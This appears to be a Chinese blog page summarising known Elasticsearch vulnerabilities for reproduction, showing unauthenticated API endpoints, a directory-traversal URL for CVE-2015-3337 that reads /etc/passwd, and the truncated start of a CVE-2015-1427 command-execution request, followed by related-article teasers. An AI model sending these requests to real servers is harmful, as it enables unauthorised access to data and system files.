Elasticsearch 漏洞收集总结

最新推荐文章于 2025-05-08 10:10:13 发布

sojrs_sec

最新推荐文章于 2025-05-08 10:10:13 发布

阅读量7.8k

点赞数 3

CC 4.0 BY-SA版权

分类专栏：漏洞复现文章标签： elasticsearch 安全漏洞

本文链接：https://blog.youkuaiyun.com/sojrs_sec/article/details/103780988

一：未授权访问获取敏感信息

/_cat/indices
/_plugin/sql/
/_nodes
/_search
/_search?preety
/_status

在这里插入图片描述

二：目录遍历漏洞（cve-2015-3337)

安装“site”功能的插件后，插件目录使用…/向上跳转，导致目录穿越漏洞，可读取任意文件。未安装site功能插件的不受影响
/_cat/plugins：查看所有已安装的插件
一般复现以head插件为例，若查看存在head插件，burp
访问

http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd

参考：https://blog.youkuaiyun.com/qq_36374896/article/details/84145527

三： CVE-2015-1427任意命令执行

JAVA反射执行代码

插入数据：

POST /website/blog/ HTTP/1.1
Host: ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Tri

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

sojrs_sec

关注关注

3
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

未授权访问：Elasticsearch 未授权访问漏洞

qq_68163788的博客

05-19

4069

ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎，基于RESTful web接口。Elasticsearch是用Java开发的，并作为Apache许可条款下的开放源码发布，是当前流行的企业级搜索引擎。Elasticsearch的增删改查操作全部由http接口完成。由于Elasticsearch授权模块需要付费，所以免费开源的Elasticsearch可能存在未授权访问漏洞。

记录开发和安全学习过程中的点点滴滴

04-22

3437

也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.

参与评论您还未登录，请先登录后发表或查看评论

Elasticsearch未授权访问漏洞

12-22

7372

　　Elasticsearch服务普遍存在一个未授权访问的问题，攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 0x00 Elasticsearch 安装前提，保证安装了JDK 1.7+ 下载地址：https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip (用迅雷打开下载，...

CVE-2025-25014（CVSS 9.1）：Kibana原型污染漏洞可导致远程代码执行

最新发布

FreeBuf_的博客

05-08

363

Kibana原型污染漏洞（CVE-2025-25014）可致RCE，速升级！

ElasticSearch 命令执行漏洞 CVE-2014-3120 漏洞测试

ADummy的博客

02-24

427

ElasticSearch 命令执行漏洞（CVE-2014-3120） by ADummy 0x00利用路线 Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍老版本ElasticSearch支持传入动态脚本（MVEL）来执行一些复杂的操作，而MVEL可执行Java代码，而且没有沙盒，所以我们可以直接执行任意代码。 MVEL执行命令的代码如下： import java.io.*; new java.util.Scanner(Runtime.g

ElasticSearch 命令执行漏洞（CVE-2014-3120）

EnerY3的博客

12-12

1278

Elasticsearch 命令执行漏洞（CVE-2014-3120），它允许攻击者通过发送精心构造的请求到 Elasticsearch 服务器来执行任意操作系统命令。这个漏洞存在于 Elasticsearch 的早期版本中，并且在较新的版本中已经被修复。

使用Elastic Security检测最新的spring4shell漏洞

点火三周的专栏

04-08

1551

这个漏洞在清明假期刚出来的时候就想研究一下，一直拖延到现在。看来是已经赶不上热度了，但我觉得还是值得记录一下的。特别是Elastic刚刚在Forrester的“终端检测与响应Wave”报告中，被评为“Strong Performer”（卓越表现者）而对于这种层出不穷的零日漏洞，即便是购买了昂贵的网络安全设备都防不住，只能做事后诸葛。那不如考虑看看免费的开源解决方案，并且检测与响应已经成为了一种安全防御的共识：边界防御是一定会被渗透的，快速的检测与响应是必须的。 Spring4Shell 漏洞的工作原理

elasticsearch-7.6.2.zip

04-14

总结，"elasticsearch-7.6.2.zip"提供的源代码有助于深入了解Elasticsearch的工作原理，对于开发人员来说，这是一份宝贵的资源，可以进行定制化开发，修复安全漏洞，优化性能，以满足特定业务需求。

elasticsearch-2.4.1+head

05-11

- 描述中提到"已经配置好的插件"，意味着这个版本可能已经集成了某些第三方插件，如Kibana用于可视化，Logstash用于日志收集，Beats用于轻量级数据发送等，这些插件扩展了Elasticsearch的功能，使得数据分析和监控...

漏洞预警：Elasticsearch的Kibana存在任意代码执行漏洞（CVE-2025-25012）

yuanlirong22的专栏

03-07

564

Elasticsearch的Kibana存在任意代码执行漏洞（CVE-2025-25012）。允许攻击者操纵应用程序的JavaScript对象和属性，可能导致未经授权的数据访问、权限提升、拒绝服务或远程代码执行。在Kibana 8.15.0和8.17.1之间的版本中，该漏洞仅可由具有查看者角色的用户利用。在Kibana版本8.17.1和8.17.2中，它只能被具有fleet-all或integrations-all或actions:execute-advanced-connectors权限的用户利用。

ElasticSearch单机或集群未授权访问漏洞

爱辉弟的博客

12-18

4792

ElasticSearch未授权访问漏洞，使用系统防火墙来做限制只允许ES集群和Server节点的IP来访问漏洞节点的9200端口，其他的全部拒绝。并在ES节点上设置用户密码

Elasticsearch 未授权访问漏洞

龙卷风摧毁停车场

03-08

6316

ElasticSearch 是一款 Java 编写的企业级搜索服务，启动此服务默认开放 HTTP-9200 端口，可被非法操作数据。

Elasticsearch写入webshell漏洞（WooYun-2015-110216)

weixin_45366453的博客

07-02

498

Elasticsearch写入webshell漏洞（WooYun-2015-110216）

ElasticSearch几个漏洞总结